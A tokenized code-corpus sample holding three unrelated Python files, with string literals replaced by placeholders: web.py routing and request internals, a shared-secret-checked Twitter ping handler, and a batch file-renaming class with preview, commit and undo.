'<STR_LIT:1>' ] : <EOL> ctx . protocol = '<STR_LIT>' <EOL> else : <EOL> ctx . protocol = '<STR_LIT:http>' <EOL> ctx . homedomain = ctx . protocol + '<STR_LIT>' + env . 
get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ctx . homepath = os . environ . get ( '<STR_LIT>' , env . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> ctx . home = ctx . homedomain + ctx . homepath <EOL> ctx . realhome = ctx . home <EOL> ctx . ip = env . get ( '<STR_LIT>' ) <EOL> ctx . method = env . get ( '<STR_LIT>' ) <EOL> ctx . path = env . get ( '<STR_LIT>' ) <EOL> if env . get ( '<STR_LIT>' , '<STR_LIT>' ) . startswith ( '<STR_LIT>' ) : <EOL> ctx . path = lstrips ( env . get ( '<STR_LIT>' ) . split ( '<STR_LIT:?>' ) [ <NUM_LIT:0> ] , ctx . homepath ) <EOL> ctx . path = urllib . unquote ( ctx . path ) <EOL> if env . get ( '<STR_LIT>' ) : <EOL> ctx . query = '<STR_LIT:?>' + env . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> ctx . query = '<STR_LIT>' <EOL> ctx . fullpath = ctx . path + ctx . query <EOL> for k , v in ctx . iteritems ( ) : <EOL> if isinstance ( v , str ) : <EOL> ctx [ k ] = v . decode ( '<STR_LIT:utf-8>' , '<STR_LIT:replace>' ) <EOL> ctx . status = '<STR_LIT>' <EOL> ctx . app_stack = [ ] <EOL> def _delegate ( self , f , fvars , args = [ ] ) : <EOL> def handle_class ( cls ) : <EOL> meth = web . ctx . method <EOL> if meth == '<STR_LIT>' and not hasattr ( cls , meth ) : <EOL> meth = '<STR_LIT:GET>' <EOL> if not hasattr ( cls , meth ) : <EOL> raise web . nomethod ( cls ) <EOL> tocall = getattr ( cls ( ) , meth ) <EOL> return tocall ( * args ) <EOL> def is_class ( o ) : return isinstance ( o , ( types . ClassType , type ) ) <EOL> if f is None : <EOL> raise web . notfound ( ) <EOL> elif isinstance ( f , application ) : <EOL> return f . handle_with_processors ( ) <EOL> elif is_class ( f ) : <EOL> return handle_class ( f ) <EOL> elif isinstance ( f , basestring ) : <EOL> if f . startswith ( '<STR_LIT>' ) : <EOL> url = f . split ( '<STR_LIT:U+0020>' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] <EOL> if web . ctx . method == "<STR_LIT:GET>" : <EOL> x = web . ctx . env . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if x : <EOL> url += '<STR_LIT:?>' + x <EOL> raise web . 
redirect ( url ) <EOL> elif '<STR_LIT:.>' in f : <EOL> mod , cls = f . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> mod = __import__ ( mod , None , None , [ '<STR_LIT>' ] ) <EOL> cls = getattr ( mod , cls ) <EOL> else : <EOL> cls = fvars [ f ] <EOL> return handle_class ( cls ) <EOL> elif hasattr ( f , '<STR_LIT>' ) : <EOL> return f ( ) <EOL> else : <EOL> return web . notfound ( ) <EOL> def _match ( self , mapping , value ) : <EOL> for pat , what in mapping : <EOL> if isinstance ( what , application ) : <EOL> if value . startswith ( pat ) : <EOL> f = lambda : self . _delegate_sub_application ( pat , what ) <EOL> return f , None <EOL> else : <EOL> continue <EOL> elif isinstance ( what , basestring ) : <EOL> what , result = utils . re_subm ( '<STR_LIT>' + pat + '<STR_LIT:$>' , what , value ) <EOL> else : <EOL> result = utils . re_compile ( '<STR_LIT>' + pat + '<STR_LIT:$>' ) . match ( value ) <EOL> if result : <EOL> return what , [ x for x in result . groups ( ) ] <EOL> return None , None <EOL> def _delegate_sub_application ( self , dir , app ) : <EOL> """<STR_LIT>""" <EOL> web . ctx . _oldctx = web . storage ( web . ctx ) <EOL> web . ctx . home += dir <EOL> web . ctx . homepath += dir <EOL> web . ctx . path = web . ctx . path [ len ( dir ) : ] <EOL> web . ctx . fullpath = web . ctx . fullpath [ len ( dir ) : ] <EOL> return app . handle_with_processors ( ) <EOL> def get_parent_app ( self ) : <EOL> if self in web . ctx . app_stack : <EOL> index = web . ctx . app_stack . index ( self ) <EOL> if index > <NUM_LIT:0> : <EOL> return web . ctx . app_stack [ index - <NUM_LIT:1> ] <EOL> def notfound ( self ) : <EOL> """<STR_LIT>""" <EOL> parent = self . get_parent_app ( ) <EOL> if parent : <EOL> return parent . notfound ( ) <EOL> else : <EOL> return web . _NotFound ( ) <EOL> def internalerror ( self ) : <EOL> """<STR_LIT>""" <EOL> parent = self . get_parent_app ( ) <EOL> if parent : <EOL> return parent . internalerror ( ) <EOL> elif web . config . 
get ( '<STR_LIT>' ) : <EOL> import debugerror <EOL> return debugerror . debugerror ( ) <EOL> else : <EOL> return web . _InternalError ( ) <EOL> class auto_application ( application ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> application . __init__ ( self ) <EOL> class metapage ( type ) : <EOL> def __init__ ( klass , name , bases , attrs ) : <EOL> type . __init__ ( klass , name , bases , attrs ) <EOL> path = attrs . get ( '<STR_LIT:path>' , '<STR_LIT:/>' + name ) <EOL> if path is not None : <EOL> self . add_mapping ( path , klass ) <EOL> class page : <EOL> path = None <EOL> __metaclass__ = metapage <EOL> self . page = page <EOL> subdir_application = application <EOL> class subdomain_application ( application ) : <EOL> """<STR_LIT>""" <EOL> def handle ( self ) : <EOL> host = web . ctx . host . split ( '<STR_LIT::>' ) [ <NUM_LIT:0> ] <EOL> fn , args = self . _match ( self . mapping , host ) <EOL> return self . _delegate ( fn , self . fvars , args ) <EOL> def _match ( self , mapping , value ) : <EOL> for pat , what in mapping : <EOL> if isinstance ( what , basestring ) : <EOL> what , result = utils . re_subm ( '<STR_LIT>' + pat + '<STR_LIT:$>' , what , value ) <EOL> else : <EOL> result = utils . re_compile ( '<STR_LIT>' + pat + '<STR_LIT:$>' ) . match ( value ) <EOL> if result : <EOL> return what , [ x for x in result . groups ( ) ] <EOL> return None , None <EOL> def loadhook ( h ) : <EOL> """<STR_LIT>""" <EOL> def processor ( handler ) : <EOL> h ( ) <EOL> return handler ( ) <EOL> return processor <EOL> def unloadhook ( h ) : <EOL> """<STR_LIT>""" <EOL> def processor ( handler ) : <EOL> try : <EOL> result = handler ( ) <EOL> is_generator = result and hasattr ( result , '<STR_LIT>' ) <EOL> except : <EOL> h ( ) <EOL> raise <EOL> if is_generator : <EOL> return wrap ( result ) <EOL> else : <EOL> h ( ) <EOL> return result <EOL> def wrap ( result ) : <EOL> def next ( ) : <EOL> try : <EOL> return result . 
next ( ) <EOL> except : <EOL> h ( ) <EOL> raise <EOL> result = iter ( result ) <EOL> while True : <EOL> yield next ( ) <EOL> return processor <EOL> def autodelegate ( prefix = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> def internal ( self , arg ) : <EOL> if '<STR_LIT:/>' in arg : <EOL> first , rest = arg . split ( '<STR_LIT:/>' , <NUM_LIT:1> ) <EOL> func = prefix + first <EOL> args = [ '<STR_LIT:/>' + rest ] <EOL> else : <EOL> func = prefix + arg <EOL> args = [ ] <EOL> if hasattr ( self , func ) : <EOL> try : <EOL> return getattr ( self , func ) ( * args ) <EOL> except TypeError : <EOL> raise web . notfound ( ) <EOL> else : <EOL> raise web . notfound ( ) <EOL> return internal <EOL> class Reloader : <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> if sys . platform . startswith ( '<STR_LIT>' ) : <EOL> SUFFIX = '<STR_LIT>' <EOL> else : <EOL> SUFFIX = '<STR_LIT>' <EOL> def __init__ ( self ) : <EOL> self . mtimes = { } <EOL> def __call__ ( self ) : <EOL> for mod in sys . modules . values ( ) : <EOL> self . check ( mod ) <EOL> def check ( self , mod ) : <EOL> if not ( mod and hasattr ( mod , '<STR_LIT>' ) and mod . __file__ ) : <EOL> return <EOL> try : <EOL> mtime = os . stat ( mod . __file__ ) . st_mtime <EOL> except ( OSError , IOError ) : <EOL> return <EOL> if mod . __file__ . endswith ( self . __class__ . SUFFIX ) and os . path . exists ( mod . __file__ [ : - <NUM_LIT:1> ] ) : <EOL> mtime = max ( os . stat ( mod . __file__ [ : - <NUM_LIT:1> ] ) . st_mtime , mtime ) <EOL> if mod not in self . mtimes : <EOL> self . mtimes [ mod ] = mtime <EOL> elif self . mtimes [ mod ] < mtime : <EOL> try : <EOL> reload ( mod ) <EOL> self . mtimes [ mod ] = mtime <EOL> except ImportError : <EOL> pass <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import doctest <EOL> doctest . testmod ( ) </s>
<s> import logging <EOL> import base . handlers <EOL> from birdfeeder import data <EOL> import birdfeeder . handlers . update <EOL> from pingersecret import SECRET <EOL> class FollowingHandler ( base . handlers . BaseHandler ) : <EOL> def get ( self ) : <EOL> if self . request . get ( '<STR_LIT>' ) != SECRET : <EOL> self . _write_input_error ( '<STR_LIT>' ) <EOL> return <EOL> self . _write_json ( data . FollowingData . get_following_list ( ) ) <EOL> class PingHandler ( base . handlers . BaseHandler ) : <EOL> def post ( self ) : <EOL> if self . request . get ( '<STR_LIT>' ) != SECRET : <EOL> self . _write_input_error ( '<STR_LIT>' ) <EOL> return <EOL> update_twitter_id = long ( self . request . get ( '<STR_LIT>' ) ) <EOL> update_status_id = long ( self . request . get ( '<STR_LIT>' ) ) <EOL> logging . info ( '<STR_LIT>' % ( <EOL> update_status_id , update_twitter_id ) ) <EOL> following_twitter_ids = data . FollowingData . get_following_twitter_ids ( <EOL> update_twitter_id ) <EOL> task_count = <NUM_LIT:0> <EOL> for following_twitter_id in following_twitter_ids : <EOL> logging . info ( '<STR_LIT>' % following_twitter_id ) <EOL> session = data . Session . get_by_twitter_id ( str ( following_twitter_id ) ) <EOL> if session : <EOL> session . enqueue_update_task ( <EOL> countdown = birdfeeder . handlers . update . PING_UPDATE_DELAY_SEC , <EOL> expected_status_id = update_status_id , <EOL> update_retry_count = <NUM_LIT:0> ) <EOL> task_count += <NUM_LIT:1> <EOL> else : <EOL> logging . info ( '<STR_LIT>' ) ; <EOL> self . response . out . write ( '<STR_LIT>' % task_count ) </s>
<s> from unicodedata import normalize <EOL> import fnmatch <EOL> import logging <EOL> import os <EOL> import re <EOL> import string <EOL> import helpers <EOL> from operator import itemgetter <EOL> log = logging . getLogger ( "<STR_LIT>" ) <EOL> class FileOps ( object ) : <EOL> def __init__ ( self , casemode = <NUM_LIT:0> , countpos = <NUM_LIT:0> , dirsonly = False , exclude = "<STR_LIT>" , <EOL> filesonly = False , hidden = False , ignorecase = False , <EOL> interactive = False , keepext = False , mediamode = False , <EOL> noclobber = False , recursive = False , regex = False , remdups = False , <EOL> remext = False , remnonwords = False , remsymbols = False , <EOL> simulate = False , spacemode = <NUM_LIT:0> , quiet = False , verbosity = <NUM_LIT:1> , <EOL> matchpattern = "<STR_LIT>" , replacepattern = "<STR_LIT>" , recursivedepth = <NUM_LIT:0> ) : <EOL> try : <EOL> self . _casemode = int ( casemode ) <EOL> except TypeError : <EOL> self . _casemode = <NUM_LIT:0> <EOL> try : <EOL> self . _countpos = int ( countpos ) <EOL> except TypeError : <EOL> self . _countpos = <NUM_LIT:0> <EOL> try : <EOL> self . _spacemode = int ( spacemode ) <EOL> except TypeError : <EOL> self . spacemode = <NUM_LIT:0> <EOL> self . _dirsonly = dirsonly <EOL> self . _filesonly = False if dirsonly else filesonly <EOL> self . _hidden = hidden <EOL> self . _ignorecase = ignorecase <EOL> self . _interactive = interactive <EOL> self . _keepext = keepext <EOL> self . _mediamode = mediamode <EOL> self . _noclobber = noclobber <EOL> self . _recursive = recursive <EOL> self . _regex = regex <EOL> self . _remdups = remdups <EOL> self . _remext = remext <EOL> self . _remnonwords = remnonwords <EOL> self . _remsymbols = remsymbols <EOL> self . _simulate = simulate <EOL> self . _recursivedepth = recursivedepth <EOL> self . _excludeedit = "<STR_LIT>" if not exclude else exclude <EOL> self . _matchedit = "<STR_LIT>" if not matchpattern else matchpattern <EOL> self . 
_replaceedit = "<STR_LIT>" if not replacepattern else replacepattern <EOL> self . _autostop = False <EOL> self . _countbase = <NUM_LIT:1> <EOL> self . _countfill = True <EOL> self . _countpreedit = "<STR_LIT>" <EOL> self . _countstep = <NUM_LIT:1> <EOL> self . _countsufedit = "<STR_LIT>" <EOL> self . _deletecheck = False <EOL> self . _deleteend = <NUM_LIT:1> <EOL> self . _deletestart = <NUM_LIT:0> <EOL> self . _filteredit = "<STR_LIT>" <EOL> self . _insertcheck = False <EOL> self . _insertedit = "<STR_LIT>" <EOL> self . _insertpos = <NUM_LIT:0> <EOL> self . _manualmirror = False <EOL> self . _matchcheck = True <EOL> self . _matchexcludecheck = False <EOL> self . _matchfiltercheck = False <EOL> self . _matchreplacecheck = True <EOL> self . _casecheck = True if isinstance ( casemode , str ) else False <EOL> self . _countcheck = True if isinstance ( countpos , str ) else False <EOL> removelist = [ remdups , remext , remnonwords , remsymbols ] <EOL> self . _removecheck = True if any ( removelist ) else False <EOL> self . _spacecheck = True if isinstance ( spacemode , str ) else False <EOL> self . stopupdate = False <EOL> self . stopcommit = False <EOL> self . includes = set ( ) <EOL> self . excludes = set ( ) <EOL> self . recursiveincludes = set ( ) <EOL> self . recursiveexcludes = set ( ) <EOL> self . configdir = helpers . get_configdir ( ) <EOL> helpers . configure_logger ( verbosity , quiet , self . configdir ) <EOL> self . history = [ ] <EOL> self . bracerx = re . compile ( "<STR_LIT>" ) <EOL> def match_filter ( self , target ) : <EOL> """<STR_LIT>""" <EOL> if not self . filteredit : <EOL> return True <EOL> if "<STR_LIT:/>" in self . filteredit : <EOL> patterns = self . filteredit . split ( "<STR_LIT:/>" ) <EOL> else : <EOL> patterns = [ self . filteredit ] <EOL> if self . regex : <EOL> for pattern in patterns : <EOL> try : <EOL> if re . search ( pattern , target , flags = self . 
ignorecase ) : <EOL> return True <EOL> except : <EOL> pass <EOL> else : <EOL> for pattern in patterns : <EOL> if fnmatch . fnmatch ( target , pattern ) : <EOL> return True <EOL> return False <EOL> def match_exclude ( self , target ) : <EOL> """<STR_LIT>""" <EOL> if not self . excludeedit : <EOL> return <EOL> if "<STR_LIT:/>" in self . excludeedit : <EOL> patterns = self . excludeedit . split ( "<STR_LIT:/>" ) <EOL> else : <EOL> patterns = [ self . excludeedit ] <EOL> if self . regex : <EOL> for pattern in patterns : <EOL> try : <EOL> if re . search ( pattern , target , flags = self . ignorecase ) : <EOL> return False <EOL> except : <EOL> pass <EOL> else : <EOL> for pattern in patterns : <EOL> if fnmatch . fnmatch ( target , pattern ) : <EOL> return False <EOL> def match ( self , target ) : <EOL> """<STR_LIT>""" <EOL> if not self . hidden and target . startswith ( "<STR_LIT:.>" ) and target not in self . includes : <EOL> return False <EOL> if self . matchexcludecheck : <EOL> if self . match_exclude ( target ) is False : <EOL> return False <EOL> if self . excludes and target in self . excludes : <EOL> return False <EOL> if self . includes and target in self . includes : <EOL> return True <EOL> if self . matchfiltercheck : <EOL> if self . match_filter ( target ) is False : <EOL> return False <EOL> return True <EOL> def get_dirs ( self , root , dirs ) : <EOL> """<STR_LIT>""" <EOL> return [ ( root , d , "<STR_LIT>" ) for d in dirs if self . match ( d ) ] <EOL> def get_files ( self , root , files ) : <EOL> """<STR_LIT>""" <EOL> return [ ( root , ) + os . path . splitext ( f ) for f in files if self . match ( f ) ] <EOL> def get_targets ( self , path = None ) : <EOL> """<STR_LIT>""" <EOL> if not path : <EOL> path = os . getcwd ( ) <EOL> levels = <NUM_LIT:0> <EOL> if self . recursive : <EOL> levels = self . recursivedepth <EOL> targets = [ ] <EOL> for root , dirs , files in helpers . walklevels ( path , levels ) : <EOL> root += "<STR_LIT:/>" <EOL> if self . 
dirsonly : <EOL> target = self . get_dirs ( root , dirs ) <EOL> elif self . filesonly : <EOL> target = self . get_files ( root , files ) <EOL> else : <EOL> target = self . get_dirs ( root , dirs ) + self . get_files ( root , files ) <EOL> targets . extend ( target ) <EOL> if self . stopupdate : <EOL> return targets <EOL> if self . countcheck : <EOL> return sorted ( targets , key = lambda i : i [ <NUM_LIT:1> ] + i [ <NUM_LIT:2> ] ) <EOL> else : <EOL> return targets <EOL> def get_previews ( self , targets , matchpat = None , replacepat = None ) : <EOL> """<STR_LIT>""" <EOL> if matchpat is not None : <EOL> self . matchedit = matchpat <EOL> if replacepat is not None : <EOL> self . replaceedit = replacepat <EOL> if self . mediamode : <EOL> self . set_mediaoptions ( ) <EOL> return self . modify_previews ( targets ) <EOL> def set_mediaoptions ( self ) : <EOL> self . casecheck = True <EOL> self . spacecheck = True <EOL> self . removecheck = True <EOL> self . casemode = <NUM_LIT:0> <EOL> self . spacemode = <NUM_LIT:6> <EOL> self . remdups = True <EOL> self . keepext = True <EOL> self . remsymbols = True <EOL> def commit ( self , previews ) : <EOL> actions = sorted ( ( ( "<STR_LIT>" . join ( i [ <NUM_LIT:0> ] ) , i [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] + i [ <NUM_LIT:1> ] ) for i in previews ) , <EOL> key = lambda i : i [ <NUM_LIT:0> ] . count ( "<STR_LIT:/>" ) , reverse = True ) <EOL> for i in actions : <EOL> log . debug ( "<STR_LIT>" . format ( i [ <NUM_LIT:0> ] , i [ <NUM_LIT:1> ] ) ) <EOL> if i [ <NUM_LIT:0> ] == i [ <NUM_LIT:1> ] : <EOL> log . warn ( "<STR_LIT>" ) <EOL> continue <EOL> if self . simulate : <EOL> continue <EOL> if self . stopcommit : <EOL> idx = actions . index ( i ) <EOL> log . warn ( "<STR_LIT>" . format ( idx + <NUM_LIT:1> ) ) <EOL> if idx : <EOL> log . warn ( "<STR_LIT>" ) <EOL> self . history . append ( actions [ : idx + <NUM_LIT:1> ] ) <EOL> return <EOL> try : <EOL> os . 
rename ( i [ <NUM_LIT:0> ] , i [ <NUM_LIT:1> ] ) <EOL> except Exception as e : <EOL> log . debug ( "<STR_LIT>" . format ( i [ <NUM_LIT:0> ] , i [ <NUM_LIT:1> ] , e ) ) <EOL> if self . autostop : <EOL> break <EOL> self . history . append ( actions ) <EOL> log . info ( "<STR_LIT>" ) <EOL> def undo ( self , actions = None ) : <EOL> if actions is None : <EOL> try : <EOL> actions = self . history . pop ( ) <EOL> except IndexError : <EOL> log . error ( "<STR_LIT>" ) <EOL> return <EOL> for i in actions : <EOL> log . debug ( "<STR_LIT>" . format ( i [ <NUM_LIT:1> ] , i [ <NUM_LIT:0> ] ) ) <EOL> if self . simulate : <EOL> continue <EOL> try : <EOL> os . rename ( i [ <NUM_LIT:1> ] , i [ <NUM_LIT:0> ] ) <EOL> except Exception as e : <EOL> log . error ( "<STR_LIT>" . format ( i [ <NUM_LIT:1> ] , i [ <NUM_LIT:0> ] , e ) ) <EOL> if self . autostop : <EOL> break <EOL> log . info ( "<STR_LIT>" ) <EOL> def modify_previews ( self , previews ) : <EOL> if self . countcheck : <EOL> lenp , base , step = len ( previews ) , self . countbase , self . countstep <EOL> countlen = len ( str ( lenp ) ) <EOL> countrange = xrange ( base , lenp * step + <NUM_LIT:1> , step ) <EOL> if self . countfill : <EOL> count = ( str ( i ) . rjust ( countlen , "<STR_LIT:0>" ) for i in countrange ) <EOL> else : <EOL> count = ( str ( i ) for i in countrange ) <EOL> modified = [ ] <EOL> for preview in previews : <EOL> name = preview [ <NUM_LIT:1> ] <EOL> if not self . remext and not self . keepext : <EOL> name += preview [ <NUM_LIT:2> ] <EOL> if self . casecheck : <EOL> name = self . apply_case ( name ) <EOL> if self . spacecheck : <EOL> name = self . apply_space ( name ) <EOL> if self . deletecheck : <EOL> name = self . apply_delete ( name ) <EOL> if self . removecheck : <EOL> name = self . apply_remove ( name ) <EOL> if self . insertcheck : <EOL> name = self . apply_insert ( name ) <EOL> if self . matchcheck : <EOL> name = self . apply_replace ( name ) <EOL> if self . 
countcheck : <EOL> try : <EOL> name = self . apply_count ( name , count . next ( ) ) <EOL> except StopIteration : <EOL> pass <EOL> if self . keepext : <EOL> name += preview [ <NUM_LIT:2> ] <EOL> preview = ( ( preview [ <NUM_LIT:0> ] , preview [ <NUM_LIT:1> ] + preview [ <NUM_LIT:2> ] ) , name ) <EOL> modified . append ( preview ) <EOL> return modified <EOL> def apply_space ( self , s ) : <EOL> if not self . spacecheck : <EOL> return s <EOL> if self . spacemode == <NUM_LIT:0> : <EOL> s = s . replace ( "<STR_LIT:U+0020>" , "<STR_LIT:_>" ) <EOL> elif self . spacemode == <NUM_LIT:1> : <EOL> s = s . replace ( "<STR_LIT:U+0020>" , "<STR_LIT:->" ) <EOL> elif self . spacemode == <NUM_LIT:2> : <EOL> s = s . replace ( "<STR_LIT:U+0020>" , "<STR_LIT:.>" ) <EOL> elif self . spacemode == <NUM_LIT:3> : <EOL> s = s . replace ( "<STR_LIT:.>" , "<STR_LIT:U+0020>" ) <EOL> elif self . spacemode == <NUM_LIT:4> : <EOL> s = s . replace ( "<STR_LIT:->" , "<STR_LIT:U+0020>" ) <EOL> elif self . spacemode == <NUM_LIT:5> : <EOL> s = s . replace ( "<STR_LIT:_>" , "<STR_LIT:U+0020>" ) <EOL> elif self . spacemode == <NUM_LIT:6> : <EOL> s = re . sub ( "<STR_LIT>" , "<STR_LIT:_>" , s ) <EOL> return s <EOL> def apply_case ( self , s ) : <EOL> if not self . casecheck : <EOL> return s <EOL> if self . casemode == <NUM_LIT:0> : <EOL> s = s . lower ( ) <EOL> elif self . casemode == <NUM_LIT:1> : <EOL> s = s . upper ( ) <EOL> elif self . casemode == <NUM_LIT:2> : <EOL> s = s . capitalize ( ) <EOL> elif self . casemode == <NUM_LIT:3> : <EOL> s = "<STR_LIT:U+0020>" . join ( [ c . capitalize ( ) for c in s . split ( ) ] ) <EOL> return s <EOL> def apply_insert ( self , s ) : <EOL> if not self . insertcheck or not self . insertedit : <EOL> return s <EOL> s = list ( s ) <EOL> s . insert ( self . insertpos , self . insertedit ) <EOL> return "<STR_LIT>" . join ( s ) <EOL> def apply_count ( self , s , count ) : <EOL> if not self . countcheck : <EOL> return s <EOL> s = list ( s ) <EOL> if self . 
countpreedit : <EOL> count = self . countpreedit + count <EOL> if self . countsufedit : <EOL> count += self . countsufedit <EOL> s . insert ( self . countpos , count ) <EOL> return "<STR_LIT>" . join ( s ) <EOL> def apply_delete ( self , s ) : <EOL> if not self . deletecheck : <EOL> return s <EOL> return s [ : self . deletestart ] + s [ self . deleteend : ] <EOL> def apply_remove ( self , s ) : <EOL> if not self . removecheck : <EOL> return s <EOL> if self . remnonwords : <EOL> s = re . sub ( "<STR_LIT>" , "<STR_LIT>" , s , flags = self . ignorecase ) <EOL> if self . remsymbols : <EOL> allowed = string . ascii_letters + string . digits + "<STR_LIT>" <EOL> for i in [ "<STR_LIT:utf-8>" , "<STR_LIT>" ] : <EOL> try : <EOL> s = "<STR_LIT>" . join ( c for c in normalize ( "<STR_LIT>" , s . decode ( i ) ) <EOL> if c in allowed ) . encode ( "<STR_LIT:utf-8>" ) <EOL> break <EOL> except UnicodeDecodeError : <EOL> pass <EOL> else : <EOL> log . debug ( "<STR_LIT>" . format ( s ) ) <EOL> if self . remdups : <EOL> s = re . sub ( r"<STR_LIT>" , r"<STR_LIT>" , s , flags = self . ignorecase ) <EOL> return s <EOL> def apply_replace ( self , s ) : <EOL> if not self . matchreplacecheck or not self . matchedit : <EOL> return s <EOL> if not self . regex : <EOL> matchpat = fnmatch . translate ( self . matchedit ) <EOL> replacepat = helpers . translate ( self . replaceedit ) <EOL> else : <EOL> matchpat = self . matchedit <EOL> replacepat = self . replaceedit <EOL> try : <EOL> s = re . sub ( matchpat , replacepat , s , flags = self . ignorecase ) <EOL> except : <EOL> pass <EOL> return s <EOL> @ property <EOL> def dirsonly ( self ) : <EOL> return self . _dirsonly <EOL> @ dirsonly . setter <EOL> def dirsonly ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _dirsonly = boolean <EOL> if boolean : <EOL> self . filesonly = False <EOL> @ property <EOL> def filesonly ( self ) : <EOL> return self . _filesonly <EOL> @ filesonly . 
setter <EOL> def filesonly ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _filesonly = boolean <EOL> if boolean : <EOL> self . dirsonly = False <EOL> @ property <EOL> def recursive ( self ) : <EOL> return self . _recursive <EOL> @ recursive . setter <EOL> def recursive ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _recursive = boolean <EOL> @ property <EOL> def recursivedepth ( self ) : <EOL> return self . _recursivedepth <EOL> @ recursivedepth . setter <EOL> def recursivedepth ( self , num ) : <EOL> log . debug ( "<STR_LIT>" . format ( num ) ) <EOL> self . _recursivedepth = num <EOL> @ property <EOL> def hidden ( self ) : <EOL> return self . _hidden <EOL> @ hidden . setter <EOL> def hidden ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _hidden = boolean <EOL> @ property <EOL> def simulate ( self ) : <EOL> return self . _simulate <EOL> @ simulate . setter <EOL> def simulate ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _simulate = boolean <EOL> @ property <EOL> def interactive ( self ) : <EOL> return self . _interactive <EOL> @ interactive . setter <EOL> def interactive ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _interactive = boolean <EOL> @ property <EOL> def noclobber ( self ) : <EOL> return self . _noclobber <EOL> @ noclobber . setter <EOL> def noclobber ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _noclobber = boolean <EOL> @ property <EOL> def keepext ( self ) : <EOL> return self . _keepext <EOL> @ keepext . setter <EOL> def keepext ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _keepext = boolean <EOL> @ property <EOL> def regex ( self ) : <EOL> return self . _regex <EOL> @ regex . setter <EOL> def regex ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . 
format ( boolean ) ) <EOL> self . _regex = boolean <EOL> @ property <EOL> def varcheck ( self ) : <EOL> return self . _varcheck <EOL> @ varcheck . setter <EOL> def varcheck ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _varcheck = boolean <EOL> @ property <EOL> def matchcheck ( self ) : <EOL> return self . _matchcheck <EOL> @ matchcheck . setter <EOL> def matchcheck ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _matchcheck = boolean <EOL> @ property <EOL> def matchexcludecheck ( self ) : <EOL> return self . _matchexcludecheck <EOL> @ matchexcludecheck . setter <EOL> def matchexcludecheck ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _matchexcludecheck = boolean <EOL> @ property <EOL> def matchfiltercheck ( self ) : <EOL> return self . _matchfiltercheck <EOL> @ matchfiltercheck . setter <EOL> def matchfiltercheck ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _matchfiltercheck = boolean <EOL> @ property <EOL> def matchreplacecheck ( self ) : <EOL> return self . _matchreplacecheck <EOL> @ matchreplacecheck . setter <EOL> def matchreplacecheck ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _matchreplacecheck = boolean <EOL> @ property <EOL> def countpreedit ( self ) : <EOL> return self . _countpreedit <EOL> @ countpreedit . setter <EOL> def countpreedit ( self , text ) : <EOL> log . debug ( "<STR_LIT>" . format ( text ) ) <EOL> self . _countpreedit = text <EOL> @ property <EOL> def countsufedit ( self ) : <EOL> return self . _countsufedit <EOL> @ countsufedit . setter <EOL> def countsufedit ( self , text ) : <EOL> log . debug ( "<STR_LIT>" . format ( text ) ) <EOL> self . _countsufedit = text <EOL> @ property <EOL> def insertedit ( self ) : <EOL> return self . _insertedit <EOL> @ insertedit . setter <EOL> def insertedit ( self , text ) : <EOL> log . 
debug ( "<STR_LIT>" . format ( text ) ) <EOL> self . _insertedit = text <EOL> @ property <EOL> def matchedit ( self ) : <EOL> return self . _matchedit <EOL> @ matchedit . setter <EOL> def matchedit ( self , text ) : <EOL> log . debug ( "<STR_LIT>" . format ( text ) ) <EOL> self . _matchedit = text <EOL> @ property <EOL> def replaceedit ( self ) : <EOL> return self . _replaceedit <EOL> @ replaceedit . setter <EOL> def replaceedit ( self , text ) : <EOL> log . debug ( "<STR_LIT>" . format ( text ) ) <EOL> self . _replaceedit = text <EOL> @ property <EOL> def filteredit ( self ) : <EOL> return self . _filteredit <EOL> @ filteredit . setter <EOL> def filteredit ( self , text ) : <EOL> log . debug ( "<STR_LIT>" . format ( text ) ) <EOL> self . _filteredit = text <EOL> @ property <EOL> def excludeedit ( self ) : <EOL> return self . _excludeedit <EOL> @ excludeedit . setter <EOL> def excludeedit ( self , text ) : <EOL> log . debug ( "<STR_LIT>" . format ( text ) ) <EOL> self . _excludeedit = text <EOL> @ property <EOL> def remsymbols ( self ) : <EOL> return self . _remsymbols <EOL> @ remsymbols . setter <EOL> def remsymbols ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _remsymbols = boolean <EOL> @ property <EOL> def autostop ( self ) : <EOL> return self . _autostop <EOL> @ autostop . setter <EOL> def autostop ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _autostop = boolean <EOL> @ property <EOL> def manualmirror ( self ) : <EOL> return self . _manualmirror <EOL> @ manualmirror . setter <EOL> def manualmirror ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _manualmirror = boolean <EOL> @ property <EOL> def removecheck ( self ) : <EOL> return self . _removecheck <EOL> @ removecheck . setter <EOL> def removecheck ( self , boolean ) : 